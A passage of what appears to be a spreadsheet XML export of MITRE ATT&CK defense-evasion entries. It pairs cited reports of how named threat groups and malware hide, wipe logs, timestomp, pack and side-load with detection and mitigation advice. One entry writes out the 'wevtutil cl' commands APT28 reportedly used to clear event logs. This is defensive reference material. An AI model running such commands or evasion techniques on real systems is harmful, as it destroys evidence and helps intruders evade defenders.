    <t>[[Software/S0013|PlugX]] has used to use DLL side-loading to evade anti-virus and to maintain persistence on a victim.[[CiteRef::Stewart 2014]][[CiteRef::FireEye Clandestine Fox Part 2]][[CiteRef::Dell TG-3390]][[CiteRef::PWC Cloud Hopper Technical Annex April 2017]][[CiteRef::Palo Alto PlugX June 2017]]</t>
  </si>
  <si>
    <t>Process use of network,Process monitoring,Loaded DLLs</t>
  </si>
  <si>
    <t>Anti-virus,Process whitelisting</t>
  </si>
  <si>
    <t>Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track DLL metadata, such as a hash, and compare DLLs that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates. ,</t>
  </si>
  <si>
    <t>Update software regularly. Install software in write-protected locations. Use the program sxstrace.exe that is included with Windows along with manual inspection to check manifest files for side-loading vulnerabilities in software.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1073</t>
  </si>
  <si>
    <t>can delete malware and associated artifacts from the victim.[[CiteRef::US-CERT FALLCHILL Nov 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0147|Pteranodon]] can delete files that may interfere with it executing. It also can delete temporary files and itself after the initial script executes.[[CiteRef::Palo Alto Gamaredon Feb 2017]]</t>
  </si>
  <si>
    <t>Malware used by [[Group/G0043|Group5]] is capable of remotely deleting files from victims.[[CiteRef::Citizen Lab Group5]]</t>
  </si>
  <si>
    <t>[[Group/G0032|Lazarus Group]] malware contains "suicide scripts" to delete malware binaries from the victim. It also uses secure file deletion to delete files from the victim.[[CiteRef::Novetta Blockbuster]]</t>
  </si>
  <si>
    <t>Rootkit</t>
  </si>
  <si>
    <t>Winnti Group</t>
  </si>
  <si>
    <t>Winnti Group Blackfly ,</t>
  </si>
  <si>
    <t>G0044</t>
  </si>
  <si>
    <t>[[Group/G0044|Winnti Group]] used a rootkit to modify typical server functionality.[[CiteRef::Kaspersky Winnti April 2013]]</t>
  </si>
  <si>
    <t>BIOS,MBR,System calls</t>
  </si>
  <si>
    <t>Anti-virus,File monitoring,Host intrusion prevention systems,Process whitelisting,Signature-based detection,System access controls,Whitelisting by file name or path</t>
  </si>
  <si>
    <t>Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. Monitor for the existence of unrecognized DLLs, devices, services, and changes to the MBR.[[CiteRef::Wikipedia Rootkit]] ,</t>
  </si>
  <si>
    <t>Identify potentially malicious software that may contain rootkit functionality, and audit and/or block it by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Administrator,SYSTEM,root</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1014</t>
  </si>
  <si>
    <t>Software: Uroburos</t>
  </si>
  <si>
    <t>[[Software/S0022|Uroburos]] is a rootkit used by [[Group/G0010|Turla]].[[CiteRef::Kaspersky Turla]]</t>
  </si>
  <si>
    <t>Software: HIDEDRV</t>
  </si>
  <si>
    <t>[[Software/S0135|HIDEDRV]] is a rootkit that hides certain operating system artifacts.[[CiteRef::ESET Sednit Part 3]]</t>
  </si>
  <si>
    <t>The "ZR" variant of [[Software/S0031|BACKSPACE]] will check to see if known host-based firewalls are installed on the infected systems. [[Software/S0031|BACKSPACE]] will attempt to establish a C2 channel, then will examine open windows to identify a pop-up from the firewall software and will simulate a mouse-click to allow the connection to proceed.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>[[Software/S0004|TinyZBot]] can disable Avira anti-virus.[[CiteRef::Cylance Cleaver]]</t>
  </si>
  <si>
    <t>[[Group/G0008|Carbanak]] may use [[Software/S0108|netsh]] to add local firewall rule exceptions.[[CiteRef::Group-IB Anunak]]</t>
  </si>
  <si>
    <t>Indicator Removal from Tools</t>
  </si>
  <si>
    <t>Analysis of [[Software/S0187|Daserf]] has shown that it regularly undergoes technical improvements to evade anti-virus detection.[[CiteRef::Trend Micro Daserf Nov 2017]]</t>
  </si>
  <si>
    <t>Process use of network,Anti-virus,Binary file metadata,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Anti-virus,Log analysis,Host intrusion prevention systems</t>
  </si>
  <si>
    <t>The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network. ,</t>
  </si>
  <si>
    <t>Mitigation is difficult in instances like this because the adversary may have access to the system through another channel and can learn what techniques or tools are blocked by resident defenses. Exercising best practices with configuration and security as well as ensuring that proper process is followed during investigation of potential compromise is essential to detecting a larger intrusion through discrete alerts.
Identify and block potentially malicious software that may be used by an adversary by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1066</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] includes a capability to modify the "beacon" payload to eliminate known signatures or unpacking methods.[[CiteRef::cobaltstrike manual]]</t>
  </si>
  <si>
    <t>Based on comparison of [[Software/S0168|Gazer]] versions, [[Group/G0010|Turla]] made an effort to obfuscate strings in the malware that could be used as IoCs, including the mutex name and named pipe.[[CiteRef::ESET Gazer Aug 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0049|OilRig]] has tested malware samples to determine AV detection and subsequently modified the samples to ensure AV evasion.[[CiteRef::Palo Alto OilRig April 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0009|Deep Panda]] has updated and modified its malware, resulting in different hash values that evade detection.[[CiteRef::Symantec Black Vine]]</t>
  </si>
  <si>
    <t>[[Group/G0035|Dragonfly]] disabled the host-based firewall on a victim and globally opened port 3389.[[CiteRef::US-CERT APT Energy Oct 2017]]</t>
  </si>
  <si>
    <t>Modify Registry</t>
  </si>
  <si>
    <t>[[Software/S0045|ADVSTORESHELL]] is capable of setting and deleting Registry values.[[CiteRef::Bitdefender APT28 Dec 2015]]</t>
  </si>
  <si>
    <t>Windows Registry,File monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.
Monitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [[Technique/T1047|Windows Management Instrumentation]] and [[Technique/T1086|PowerShell]], which may require additional logging features to be configured in the operating system to collect necessary information for analysis. ,</t>
  </si>
  <si>
    <t>Misconfiguration of permissions in the Registry may lead to opportunities for an adversary to execute code, like through [[Technique/T1058|Service Registry Permissions Weakness]]. Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.
Identify and block unnecessary system utilities or potentially malicious software that may be used to modify the Registry by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Bartosz Jerzman,Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1112</t>
  </si>
  <si>
    <t>[[Software/S0031|BACKSPACE]] is capable of deleting Registry keys, sub-keys, and values on a victim system.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>[[Software/S0157|SOUNDBITE]] is capable of modifying the Registry.[[CiteRef::FireEye APT32 May 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0023|CHOPSTICK]] may store RC4 encrypted configuration information in the Windows Registry.[[CiteRef::FireEye APT28]]</t>
  </si>
  <si>
    <t>[[Software/S0130|Unknown Logger]] has functionality to disable security tools, including Kaspersky, BitDefender, and MalwareBytes.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>[[Software/S0144|ChChes]] can alter the victim's proxy configuration.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>Various [[Group/G0032|Lazarus Group]] malware modifies the Windows firewall to allow incoming connections or disable it entirely using [[Software/S0108|netsh]]. [[CiteRef::Novetta Blockbuster Loaders]] [[CiteRef::Novetta Blockbuster Tools]] [[Group/G0032|Lazarus Group]] malware TangoDelta attempts to terminate various processes associated with McAfee.[[CiteRef::Novetta Blockbuster Tools]]</t>
  </si>
  <si>
    <t>[[Software/S0148|RTM]] can delete all Registry entries created during its execution.[[CiteRef::ESET RTM Feb 2017]]</t>
  </si>
  <si>
    <t>Software: Reg, reg.exe</t>
  </si>
  <si>
    <t>[[Software/S0075|Reg]] may be used to interact with and modify the Windows Registry of a local or remote system at the command-line interface.[[CiteRef::Microsoft Reg]]</t>
  </si>
  <si>
    <t>[[Software/S0158|PHOREAL]] is capable of manipulating the Registry.[[CiteRef::FireEye APT32 May 2017]]</t>
  </si>
  <si>
    <t>Software: StreamEx</t>
  </si>
  <si>
    <t>[[Software/S0142|StreamEx]] has the ability to modify the Registry.[[CiteRef::Cylance Shell Crew Feb 2017]]</t>
  </si>
  <si>
    <t>Some [[Software/S0074|Sakula]] samples use cmd.exe to delete temporary files.[[CiteRef::Dell Sakula]]</t>
  </si>
  <si>
    <t>Binary Padding</t>
  </si>
  <si>
    <t>A version of [[Software/S0117|XTunnel]] introduced in July 2015 inserted junk code into the binary in a likely attempt to obfuscate it and bypass security products.[[CiteRef::ESET Sednit Part 2]]</t>
  </si>
  <si>
    <t>Anti-virus,Signature-based detection</t>
  </si>
  <si>
    <t>Depending on the method used to pad files, a file-based signature may be capable of detecting padding using a scanning or on-access based tool. 
When executed, the resulting process from padded files may also exhibit other behavior characteristics of being used to conduct an intrusion such as system and network information [[Discovery]] or [[Lateral Movement]], which could be used as event indicators that point to the source file. ,</t>
  </si>
  <si>
    <t>Identify potentially malicious software that may be executed from a padded or otherwise obfuscated binary, and audit and/or block it by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1009</t>
  </si>
  <si>
    <t>[[Software/S0137|CORESHELL]] contains unused machine instructions in a likely attempt to hinder analysis.[[CiteRef::FireEye APT28]]</t>
  </si>
  <si>
    <t>A variant of [[Software/S0082|Emissary]] appends junk data to the end of its DLL file to create a large file that may exceed the maximum size that anti-virus programs can scan.[[CiteRef::Emissary Trojan Feb 2016]]</t>
  </si>
  <si>
    <t>[[Group/G0060|BRONZE BUTLER]] downloader code has included "0" characters at the end of the file to inflate the file size in a likely attempt to evade anti-virus detection.[[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>Indicator Removal on Host</t>
  </si>
  <si>
    <t>[[Software/S0083|Misdat]] is capable of deleting Registry keys used for persistence.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>File system monitoring may be used to detect improper deletion or modification of indicator files. Events not stored on the file system will require different detection mechanisms. ,</t>
  </si>
  <si>
    <t>Automatically forward events to a log server or data repository to prevent conditions in which the adversary can locate and manipulate data on the local system. When possible, minimize time delay on event reporting to avoid prolonged storage on the local system. Protect generated event files that are stored locally with proper permissions and authentication. Obfuscate/encrypt event files locally and in transit to avoid giving feedback to an adversary.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1070</t>
  </si>
  <si>
    <t>[[Software/S0148|RTM]] has the ability to remove Registry entries that it created during execution.[[CiteRef::ESET RTM Feb 2017]]</t>
  </si>
  <si>
    <t>The [[Software/S0089|BlackEnergy]] component KillDisk is capable of deleting Windows Event Logs.[[CiteRef::ESEST Black Energy Jan 2016]]</t>
  </si>
  <si>
    <t>[[Group/G0053|FIN5]] has cleared event logs from victims.[[CiteRef::Mandiant FIN5 GrrCON Oct 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0032|gh0st]] RAT is able to wipe event logs.[[CiteRef::FireEye Hacking Team]]</t>
  </si>
  <si>
    <t>[[Group/G0007|APT28]] has cleared event logs using the commands &lt;code&gt;wevtutil cl System&lt;/code&gt; and &lt;code&gt;wevtutil cl Security&lt;/code&gt;.[[CiteRef::Crowdstrike DNC June 2016]]</t>
  </si>
  <si>
    <t>[[Group/G0016|APT29]] used sdelete to remove artifacts from victims.[[CiteRef::Mandiant No Easy Breach]]</t>
  </si>
  <si>
    <t>Process Hollowing</t>
  </si>
  <si>
    <t>[[Software/S0128|BADNEWS]] has a command to download an .exe and use process hollowing to inject it into a new process.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>Process monitoring,API monitoring</t>
  </si>
  <si>
    <t>Process whitelisting,Anti-virus,Whitelisting by file name or path,Signature-based detection</t>
  </si>
  <si>
    <t>Monitoring API calls may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. API calls that unmap process memory, such as ZwUnmapViewOfSection or NtUnmapViewOfSection, and those that can be used to modify memory within another process, such as WriteProcessMemory, may be used for this technique.[[CiteRef::Engame Process Injection July 2017]]
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ,</t>
  </si>
  <si>
    <t>This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating specific API calls will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior. 
Although process hollowing may be used to evade certain types of defenses, it is still good practice to identify potentially malicious software that may be used to perform adversarial actions and audit and/or block it by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1093</t>
  </si>
  <si>
    <t>Software: ISMInjector</t>
  </si>
  <si>
    <t>[[Software/S0189|ISMInjector]] hollows out a newly created process RegASM.exe and injects its payload into the hollowed process.[[CiteRef::OilRig New Delivery Oct 2017]]</t>
  </si>
  <si>
    <t>A [[Group/G0040|Patchwork]] payload uses process hollowing to hide the UAC bypass vulnerability exploitation inside svchost.exe.[[CiteRef::Cymmetria Patchwork]]</t>
  </si>
  <si>
    <t>[[Group/G0002|Moafee]] has been known to employ binary padding.[[CiteRef::Haq 2014]]</t>
  </si>
  <si>
    <t>[[Group/G0016|APT29]] used multiple versions of malware, and also minimized re-use of commonly-identified indicators like MD5s and C2s.[[CiteRef::Mandiant No Easy Breach]]</t>
  </si>
  <si>
    <t>[[Group/G0035|Dragonfly]] deleted system, security, terminal services, remote services, and audit logs from a victim.[[CiteRef::US-CERT APT Energy Oct 2017]]</t>
  </si>
  <si>
    <t>Timestomp</t>
  </si>
  <si>
    <t>can timestomp files on victims using a Web shell.[[CiteRef::FireEye APT34 Webinar Dec 2017]]</t>
  </si>
  <si>
    <t>Forensic techniques exist to detect aspects of files that have had their timestamps modified.[[CiteRef::WindowsIR Anti-Forensic Techniques]] It may be possible to detect timestomping using file modification monitoring that collects information on file handle opens and can compare timestamp values. ,</t>
  </si>
  <si>
    <t>Mitigation of timestomping specifically is likely difficult. Efforts should be focused on preventing potentially malicious software from running. Identify and block potentially malicious software that may contain functionality to perform timestomping by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Linux,Windows</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1099</t>
  </si>
  <si>
    <t>The [[Software/S0021|Derusbi]] malware supports timestomping.[[CiteRef::Axiom]][[CiteRef::Fidelis Turbo]]</t>
  </si>
  <si>
    <t>[[Group/G0050|APT32]] has used scheduled task raw XML with a backdated timestamp of June 2, 2016.[[CiteRef::FireEye APT32 May 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] will timestomp any files or payloads placed on a target machine to help them blend in.[[CiteRef::cobaltstrike manual]]</t>
  </si>
  <si>
    <t>Many [[Software/S0083|Misdat]] samples were programmed using Borland Delphi, which will mangle the default PE compile timestamp of a file.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>Several [[Group/G0032|Lazarus Group]] malware families use timestomping, including modifying the last write timestamp of a specified Registry key to a random date, as well as copying the timestamp for legitimate .exe files (such as calc.exe or mspaint.exe) to its dropped files.[[CiteRef::Novetta Blockbuster Destructive Malware]][[CiteRef::Novetta Blockbuster Loaders]]</t>
  </si>
  <si>
    <t>After creating a new service for persistence,  sets the file creation time for the service to the creation time of the victim's legitimate svchost.exe file.[[CiteRef::ClearSky Wilted Tulip July 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0078|Psylo]] has a command to conduct timestomping by setting a specified file?s timestamps to match those of a system file in the System32 directory.[[CiteRef::Scarlet Mimic Jan 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0066|3PARA RAT]] has a command to set certain attributes such as creation/modification timestamps on files.[[CiteRef::CrowdStrike Putter Panda]]</t>
  </si>
  <si>
    <t>For early [[Software/S0168|Gazer]] versions, the compilation timestamp was faked.[[CiteRef::ESET Gazer Aug 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0072|OwaAuth]] has a command to timestop a file or directory.[[CiteRef::Dell TG-3390]]</t>
  </si>
  <si>
    <t>[[Software/S0081|Elise]] performs timestomping of a CAB file it creates.[[CiteRef::Lotus Blossom Jun 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0136|USBStealer]] sets the timestamps of its dropper files to the last-access and last-write timestamps of a standard Windows library chosen on the system.[[CiteRef::ESET Sednit USBStealer 2014]]</t>
  </si>
  <si>
    <t>[[Software/S0150|POSHSPY]] modifies timestamps of all downloaded executables to match a randomly selected file created prior to 2013.[[CiteRef::FireEye POSHSPY April 2017]]</t>
  </si>
  <si>
    <t>can modify file or directory timestamps.[[CiteRef::US-CERT FALLCHILL Nov 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0007|APT28]] has performed timestomping on victim files.[[CiteRef::Crowdstrike DNC June 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] can use process hollowing for execution.[[CiteRef::Cobalt Strike TTPs Dec 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0022|APT3]] has a tool that can delete files.[[CiteRef::FireEye Clandestine Fox]]</t>
  </si>
  <si>
    <t>[[Software/S0139|PowerDuke]] has a command to write random data across a file and delete it.[[CiteRef::Volexity PowerDuke November 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0155|WINDSHIELD]] is capable of file deletion along with other file system interaction.[[CiteRef::FireEye APT32 May 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0050|APT32]] has cleared select event log entries.[[CiteRef::FireEye APT32 May 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0053|SeaDuke]] can securely delete files, including deleting itself from the victim.[[CiteRef::Symantec Seaduke 2015]]</t>
  </si>
  <si>
    <t>The [[Software/S0044|JHUHUGIT]] dropper deletes itself from the victim.[[CiteRef::ESET Sednit Part 1]]</t>
  </si>
  <si>
    <t>[[Group/G0007|APT28]] has deleted files from the system via the NSFileManager:removeFileAtPath method [[CiteRef::XAgentOSX]].</t>
  </si>
  <si>
    <t>[[Software/S0136|USBStealer]] has several commands to delete files associated with the malware from the victim.[[CiteRef::ESET Sednit USBStealer 2014]]</t>
  </si>
  <si>
    <t>[[Software/S0045|ADVSTORESHELL]] can delete files and directories.[[CiteRef::ESET Sednit Part 2]]</t>
  </si>
  <si>
    <t>The [[Group/G0060|BRONZE BUTLER]] uploader or malware the uploader uses &lt;code&gt;command&lt;/code&gt; to delete the RAR archives after they have been exfiltrated.[[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>creates then deletes log files during installation of itself as a service.[[CiteRef::ClearSky Wilted Tulip July 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0057|APT34]] has deleted initial drop files from the staging directory.[[CiteRef::FireEye APT34 Dec 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0027|Threat Group-3390]] actors have used DLL side-loading. Actors have used legitimate Kaspersky anti-virus variants in which the DLL acts as a stub loader that loads and executes the shell code.[[CiteRef::Dell TG-3390]][[CiteRef::SecureWorks BRONZE UNION June 2017]]</t>
  </si>
  <si>
    <t>side loads a malicious file, sspisrv.dll, in part of a spoofed lssas.exe service.[[CiteRef::Microsoft SIR Vol 21]][[CiteRef::Microsoft Wingbird Nov 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0070|HTTPBrowser]] has used DLL side-loading.[[CiteRef::Dell TG-3390]]</t>
  </si>
  <si>
    <t>[[Software/S0072|OwaAuth]] has been loaded onto Exchange servers and disguised as an ISAPI filter (DLL file). The IIS w3wp.exe process then loads the malicious DLL.[[CiteRef::Dell TG-3390]]</t>
  </si>
  <si>
    <t>[[Group/G0022|APT3]] has been known to side load DLLs with a valid version of Chrome with one of their tools. [[CiteRef::FireEye Clandestine Fox Part 2]]</t>
  </si>
  <si>
    <t>[[Software/S0074|Sakula]] uses DLL side-loading, typically using a digitally signed sample of Kaspersky Anti-Virus (AV) 6.0 for Windows Workstations or McAfee's Outlook Scan About Box to load malicious DLL files.[[CiteRef::Dell Sakula]]</t>
  </si>
  <si>
    <t>[[Group/G0027|Threat Group-3390]] has used appcmd.exe to disable logging on a victim server.[[CiteRef::SecureWorks BRONZE UNION June 2017]]</t>
  </si>
  <si>
    <t>Malware used by [[Group/G0024|Putter Panda]] attempts to terminate processes corresponding to two components of Sophos Anti-Virus (SAVAdminService.exe and SavService.exe).[[CiteRef::CrowdStrike Putter Panda]]</t>
  </si>
  <si>
    <t>[[Software/S0125|Remsec]] can add or remove applications or ports on the Windows firewall or disable it entirely.[[CiteRef::Kaspersky ProjectSauron Technical Analysis]]</t>
  </si>
  <si>
    <t>The [[Software/S0162|Komplex]] trojan supports file deletion.[[CiteRef::Sofacy Komplex Trojan]]</t>
  </si>
  <si>
    <t>[[Software/S0161|XAgentOSX]] contains the deletFileFromPath function to delete a specified file using the NSFileManager:removeFileAtPath method.[[CiteRef::XAgentOSX]]</t>
  </si>
  <si>
    <t>[[Group/G0026|APT18]] actors deleted tools and batch files from victim systems.[[CiteRef::Dell Lateral Movement]]</t>
  </si>
  <si>
    <t>[[Group/G0045|menuPass]] has used DLL side-loading to launch versions of Mimikatz and PwDump6.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0069|BLACKCOFFEE]] has the capability to delete files.[[CiteRef::FireEye APT17]]</t>
  </si>
  <si>
    <t>[[Software/S0128|BADNEWS]] typically loads its DLL file into a legitimate signed Java executable.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>Obfuscated Files or Information</t>
  </si>
  <si>
    <t>The [[Software/S0170|Helminth]] config file is encrypted with RC4.[[CiteRef::Palo Alto OilRig May 2016]]</t>
  </si>
  <si>
    <t>Network protocol analysis,Process use of network,Binary file metadata,File monitoring,Malware reverse engineering</t>
  </si>
  <si>
    <t>Host forensic analysis,Signature-based detection,Host intrusion prevention systems</t>
  </si>
  <si>
    <t>Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system). ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1027</t>
  </si>
  <si>
    <t>[[Group/G0057|APT34]] has used base64-encoded files that are dropped to victims.[[CiteRef::FireEye APT34 Dec 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0050|APT32]] has used Daniel Bohannon?s Invoke-Obfuscation framework to obfuscate their PowerShell.[[CiteRef::FireEye APT32 May 2017]][[CiteRef::GitHub Invoke-Obfuscation]]</t>
  </si>
  <si>
    <t>[[Software/S0142|StreamEx]] obfuscates some commands by using statically programmed fragments of strings when starting a DLL. It also uses a one-byte xor against 0x91 to encode configuration data.[[CiteRef::Cylance Shell Crew Feb 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0074|Sakula]] uses single-byte XOR obfuscation to obfuscate many of its files.[[CiteRef::Dell Sakula]]</t>
  </si>
  <si>
    <t>[[Software/S0187|Daserf]] uses encrypted Windows APIs and also encrypts data using the alternative base64+RC4 or the Caesar cipher.[[CiteRef::Trend Micro Daserf Nov 2017]]</t>
  </si>
  <si>
    <t>Software Packing</t>
  </si>
  <si>
    <t>[[Software/S0094|Trojan.Karagany]] samples sometimes use common binary packers such as UPX and Aspack on top of a custom Delphi binary packer.[[CiteRef::Symantec Dragonfly]]</t>
  </si>
  <si>
    <t>Binary file metadata</t>
  </si>
  <si>
    <t>Anti-virus,heuristic detection,Signature-based detection</t>
  </si>
  <si>
    <t>Use file scanning to look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code. ,</t>
  </si>
  <si>
    <t>Ensure updated virus definitions. Create custom signatures for observed malware. Employ heuristic-based malware detection.
Identify and prevent execution of potentially malicious software that may have been packed by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1045</t>
  </si>
  <si>
    <t>[[Group/G0043|Group5]] packed an executable by base64 encoding the PE file and breaking it up into numerous lines.[[CiteRef::Citizen Lab Group5]]</t>
  </si>
  <si>
    <t>Night Dragon</t>
  </si>
  <si>
    <t>Night Dragon ,</t>
  </si>
  <si>
    <t>G0014</t>
  </si>
  <si>
    <t>[[Group/G0014|Night Dragon]] is known to use software packing in its tools.[[CiteRef::McAfee Night Dragon]]</t>
  </si>
  <si>
    <t>[[Group/G0016|APT29]] used UPX to pack files.[[CiteRef::Mandiant No Easy Breach]]</t>
  </si>
  <si>
    <t>[[Software/S0053|SeaDuke]] has been packed with the UPX packer.[[CiteRef::Unit 42 SeaDuke 2015]]</t>
  </si>
  <si>
    <t>A version of [[Software/S0187|Daserf]] uses the MPRESS packer.[[CiteRef::Trend Micro Daserf Nov 2017]]</t>
  </si>
  <si>
    <t>The [[Software/S0062|DustySky]] dropper uses a function to obfuscate the name of functions and other parts of the malware.[[CiteRef::DustySky]]</t>
  </si>
  <si>
    <t>A [[Software/S0153|RedLeaves]] configuration file is encrypted with a simple XOR key, 0x53.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0059|Magic Hound]] malware has used base64-encoded commands and files, and has also encrypted embedded strings with AES.[[CiteRef::Unit 42 Magic Hound Feb 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0189|ISMInjector]] is obfuscated with the off-the-shelf SmartAssembly .NET obfuscator created by red-gate.com.[[CiteRef::OilRig New Delivery Oct 2017]]</t>
  </si>
  <si>
    <t>Software: TINYTYPHON</t>
  </si>
  <si>
    <t>[[Software/S0131|TINYTYPHON]] has used XOR with 0x90 to obfuscate its configuration file.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>[[Group/G0043|Group5]] disguised its malicious binaries with several layers of obfuscation, including encrypting the files.[[CiteRef::Citizen Lab Group5]]</t>
  </si>
  <si>
    <t>If the victim is using PowerShell 3.0 or later, [[Software/S0145|POWERSOURCE]] writes its decoded payload to an Alternate Data Stream (ADS) named kernel32.dll that is saved in &lt;code&gt;%PROGRAMDATA%\Windows\&lt;/code&gt;.[[CiteRef::Cisco DNSMessenger March 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0031|Dust Storm]] has encoded payloads with a single-byte XOR, both skipping the key itself and zeroing in an attempt to avoid exposing the key.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>Variants of [[Software/S0082|Emissary]] encrypt payloads using various XOR ciphers, as well as a custom algorithm that uses the "srand" and "rand" functions.[[CiteRef::Lotus Blossom Dec 2015]][[CiteRef::Emissary Trojan Feb 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0081|Elise]] encrypts several of its files, including configuration files.[[CiteRef::Lotus Blossom Jun 2015]]</t>
  </si>
  <si>
